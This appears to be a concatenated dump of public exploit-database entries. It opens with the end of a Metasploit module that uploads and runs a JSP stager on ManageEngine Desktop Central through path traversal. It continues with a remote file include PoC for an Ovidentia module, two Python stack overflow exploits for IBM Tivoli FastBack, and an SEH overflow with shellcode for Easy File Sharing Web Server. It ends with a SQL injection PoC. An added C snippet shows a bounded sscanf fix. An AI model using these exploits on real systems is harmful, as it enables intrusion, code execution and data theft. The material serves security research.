  end

  def get_build_number(res)
    inputs = res.get_hidden_inputs
    # The buildNum input is in the first form
    inputs.first['buildNum']
  end

  def get_html_title(res)
    html = res.body
    n = ::Nokogiri::HTML(html)
    n.at_xpath('//title').text
  end

  def check
    uri = normalize_uri(target_uri.path, '/configurations.do')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    build_number = get_build_number(res)
    vprint_status("Found build number: #{build_number}")

    html_title   = get_html_title(res)
    vprint_status("Found title: #{html_title}")

    if build_number <= '91084'
      return Exploit::CheckCode::Appears
    elsif /ManageEngine Desktop Central/ === html_title
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def upload_jsp(stager_info)
    # connectionId is part of the 7z filename
    # computerName is part of the 7z filename (but will be used due to the null byte injection)
    # customerId is used as a directory name
    #
    # The intended upload path is:
    # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\server-data\[customerId]\rds\scr-rec\null-computerName-connectionId.7z
    # But this will upload to:
    # C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf

    uri = normalize_uri(target_uri.path, 'fileupload')

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => uri,
      'ctype'    => 'application/octet-stream',
      'encode_params' => false,
      'data'     => stager_info[:jsp_payload],
      'vars_get' => {
        'connectionId' => "#{Rex::Text.rand_text_alpha(1)}/../../../../../jspf/#{stager_info[:jsp_name]}%00",
        'resourceId'   => Rex::Text.rand_text_alpha(1),
        'action'       => 'rds_file_upload',
        'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
        'customerId'   => Rex::Text.rand_text_numeric(rand(10)+5)
      }
    })

    if res.nil?
      fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
    elsif res && res.code != 200
      fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
    end
  end

  def exec_jsp(stager_info)
    uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    if res.nil?
      fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
    elsif res && res.code != 200
      fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
    end
  end

  def exploit
    print_status("Creating JSP stager")
    stager_info = get_jsp_stager

    print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
    upload_jsp(stager_info)

    print_status("Executing stager...")
    exec_jsp(stager_info)
  end

end
            
# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880


Proof-of-Concept:

/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------

require_once $GLOBALS['babInstallPath'].'utilit/defines.php';

---------------------------------------------------------------

[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?


Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
             So an attacker can use this to execute some php-shellcode for example.


### The 27 years old, german hacker bd0rk ###
            
#!/usr/bin/python
#         
################################################################################
#
#            Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
#                   _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
#             Date: 14 December 2015
#           Author: Gianni Gnesa (gnix) 
#
#  Vendor Homepage: http://www.ibm.com/
#    Software Name: IBM Tivoli Storage Manager FastBack 
# Software Version: 5.5.4.2 (x86)
#    Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
#                   - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" 
#                     (Version 5.5.4.2, Size: 120.7 MB)
#
#        Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk 
# function caused by the insecure usage of _sscanf while parsing user-controlled 
# input.
#
# .text:0057898E      lea     eax, [ebp+var_210]
# .text:00578994      push    eax
# .text:00578995      lea     ecx, [ebp+var_108]
# .text:0057899B      push    ecx
# .text:0057899C      lea     edx, [ebp+var_20C]
# .text:005789A2      push    edx
# .text:005789A3      lea     eax, [ebp+var_4]
# .text:005789A6      push    eax
# .text:005789A7      lea     ecx, [ebp+var_104]      <=== Buffer that will be overwritten
# .text:005789AD      push    ecx
# .text:005789AE      push    offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:005789B3      mov     edx, [ebp+Src]
# .text:005789B6      push    edx             ; Src   <=== Buffer under our control
# .text:005789B7      call    _sscanf                 <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (b44.9dc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01dae328 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 41414141 ??              ???
#
################################################################################

import sys
import time
import socket
from struct import pack


def create_pkt(opcode, p1="", p2="", p3=""):

	# psAgentCommand (0x30 bytes)
	buf = "\x44" * 0xC
	buf+= pack("<L", opcode)			# opcode

	buf+= pack("<i", 0x0)				# 1st memcpy: offset (in psCommandBuffer.data) for Src field 
	buf+= pack("<i", len(p1)) 			# 1st memcpy: size field
	buf+= pack("<i", len(p1))			# 2nd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p2)) 			# 2nd memcpy: size field
	buf+= pack("<i", len(p1) + len(p2))	# 3rd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p3)) 			# 3rd memcpy: size field

	buf+= "\x44\x44\x44\x44"
	buf+= "\x44\x44\x44\x44"

	# psCommandBuffer
	buf+= p1
	buf+= p2
	buf+= p3
	
	# buf len - 4 because the packet length is not included
	buf = pack(">i", len(buf)-4) + buf
	
	return buf
	
	
def main():
	if len(sys.argv) != 2:
		print "Usage: %s <ip_address>\n" % sys.argv[0]
		sys.exit(1)

	server = sys.argv[1]
	port = 11460

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((server, port))
	
	pkt = create_pkt(	opcode=0x531,
						p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
						p2 = "B" * 24000,
						p3 = "C" * 24000 )

	s.send(pkt)	
	s.close()
    
	print "[+] Packet sent."
	sys.exit(0) 
	
	
if __name__ == "__main__":
	main()
            
#!/usr/bin/python
#         
################################################################################
#
#            Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
#                   _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability
#             Date: 14 December 2015
#           Author: Gianni Gnesa (gnix) 
#
#  Vendor Homepage: http://www.ibm.com/
#    Software Name: IBM Tivoli Storage Manager FastBack 
# Software Version: 5.5.4.2 (x86)
#    Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
#                   - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" 
#                     (Version 5.5.4.2, Size: 120.7 MB)
#
#        Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_SetConfFileChunk 
# function caused by the insecure usage of _sscanf while parsing user-controlled 
# input.
#
# .text:00578D28      lea     eax, [ebp+var_8]
# .text:00578D2B      push    eax              
# .text:00578D2C      lea     ecx, [ebp+var_C]
# .text:00578D2F      push    ecx              
# .text:00578D30      lea     edx, [ebp+var_318]
# .text:00578D36      push    edx               
# .text:00578D37      lea     eax, [ebp+var_4]
# .text:00578D3A      push    eax                  
# .text:00578D3B      lea     ecx, [ebp+Str1]         <=== Buffer that will be overwritten
# .text:00578D41      push    ecx                
# .text:00578D42      push    offset $SG128695 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:00578D47      mov     edx, [ebp+Src]
# .text:00578D4A      push    edx             ; Src   <=== Buffer under our control
# .text:00578D4B      call    _sscanf                 <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (a20.ee8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01eaca78 edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01eae324 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 41414141 ??              ???
#
################################################################################

import sys
import time
import socket
from struct import pack


def create_pkt(opcode, p1="", p2="", p3=""):

	# psAgentCommand (0x30 bytes)
	buf = "\x44" * 0xC
	buf+= pack("<L", opcode)			# opcode

	buf+= pack("<i", 0x0)				# 1st memcpy: offset (in psCommandBuffer.data) for Src field 
	buf+= pack("<i", len(p1)) 			# 1st memcpy: size field
	buf+= pack("<i", len(p1))			# 2nd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p2)) 			# 2nd memcpy: size field
	buf+= pack("<i", len(p1) + len(p2))	# 3rd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p3)) 			# 3rd memcpy: size field

	buf+= "\x44\x44\x44\x44"
	buf+= "\x44\x44\x44\x44"

	# psCommandBuffer
	buf+= p1
	buf+= p2
	buf+= p3
	
	# buf len - 4 because the packet length is not included
	buf = pack(">i", len(buf)-4) + buf
	
	return buf
	
	
def main():
	if len(sys.argv) != 2:
		print "Usage: %s <ip_address>\n" % sys.argv[0]
		sys.exit(1)

	server = sys.argv[1]
	port = 11460

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((server, port))
	
	pkt = create_pkt(	opcode=0x534,
						p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
						p2 = "B" * 24000,
						p3 = "C" * 24000 )

	s.send(pkt)	
	s.close()
    
	print "[+] Packet sent."
	sys.exit(0) 
	
	
if __name__ == "__main__":
	main()
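The sscanf call annotated in the disassembly above, seen from the defender's side: an added example, not code from the original exploit or the vulnerable product, that parses the same format string with a width-limited `%s` so the File: token can never overrun its destination. The 256-byte buffer size and the request layout built by parse_constructed are assumptions (the page does not give the real size of Str1).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed destination size; the real size of Str1 is not given in the page. */
#define NAME_MAX_LEN 256

struct file_cmd {
    char name[NAME_MAX_LEN];
    int from, to, chunk_loc, file_loc;
};

/* The binary's call, per the disassembly, is the unbounded form:
 *   sscanf(src, "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d", name, ...)
 * "%s" has no width, so a long File: token writes past 'name' and reaches the
 * saved EBP/EIP seen in the crash dump. The hardened form caps the conversion at
 * NAME_MAX_LEN-1 bytes (the width must track the buffer size; sscanf adds the
 * NUL) and treats anything other than five matched fields as malformed input. */
int parse_file_cmd(const char *src, struct file_cmd *out)
{
    int n = sscanf(src, "File: %255s From: %d To: %d ChunkLoc: %d FileLoc: %d",
                   out->name, &out->from, &out->to, &out->chunk_loc, &out->file_loc);
    return (n == 5) ? 0 : -1;
}

/* Builds a constructed request shaped like the exploit's p1 ("File: " followed by
 * name_len 'A's and the four integers), parses it, and reports how many bytes
 * reached the name buffer. Returns parse_file_cmd's result. */
int parse_constructed(size_t name_len, size_t *name_len_out)
{
    static const char tail[] = " From: 0 To: 0 ChunkLoc: 0 FileLoc: 0";
    struct file_cmd cmd;
    char *src = malloc(6 + name_len + sizeof tail);
    if (src == NULL)
        return -1;
    memcpy(src, "File: ", 6);
    memset(src + 6, 'A', name_len);
    memcpy(src + 6 + name_len, tail, sizeof tail);   /* copies the NUL too */
    memset(&cmd, 0, sizeof cmd);
    int rc = parse_file_cmd(src, &cmd);
    *name_len_out = strlen(cmd.name);
    free(src);
    return rc;
}
```

With the exploit's 10000-byte name, the width limit stops after 255 bytes and the leftover 'A's make the literal " From:" fail to match, so the request is rejected (rc -1) with exactly 255 bytes in the buffer instead of a smashed stack.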
            
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# Category: Remote Exploit
# Usage: ./exploit.py ip port

import socket
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

a = socket.socket()

print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))

entire=4500

# Junk
buff = "A"*4061

# Next SEH
buff+= "\xeb\x0A\x90\x90"

# pop pop ret
buff+= "\x98\x97\x01\x10"

buff+= "\x90"*19

# calc.exe
# Bad Characters: \x20 \x2f \x5c
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)
buff+= shellcode

buff+= "\x90"*7

buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)

# GET
a.send("GET " + buff + " HTTP/1.0\r\n\r\n")

a.close()

print "Done..."
            
#Exploit Title : ECommerceMajor SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94

1. Description

The "prodid" parameter in productdtl.php is not sanitized before it is placed into the
SQL query, which leads to an SQL injection vulnerability.

2. Vulnerable Code:

Lines 14 to 28 of productdtl.php:

<?php
$getallproduct="select * from purchase where id=$_GET[prodid] order by id desc";
$getallproductresult=mysql_query($getallproduct);
$getallproducttotal=mysql_num_rows($getallproductresult);

3. POC

http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI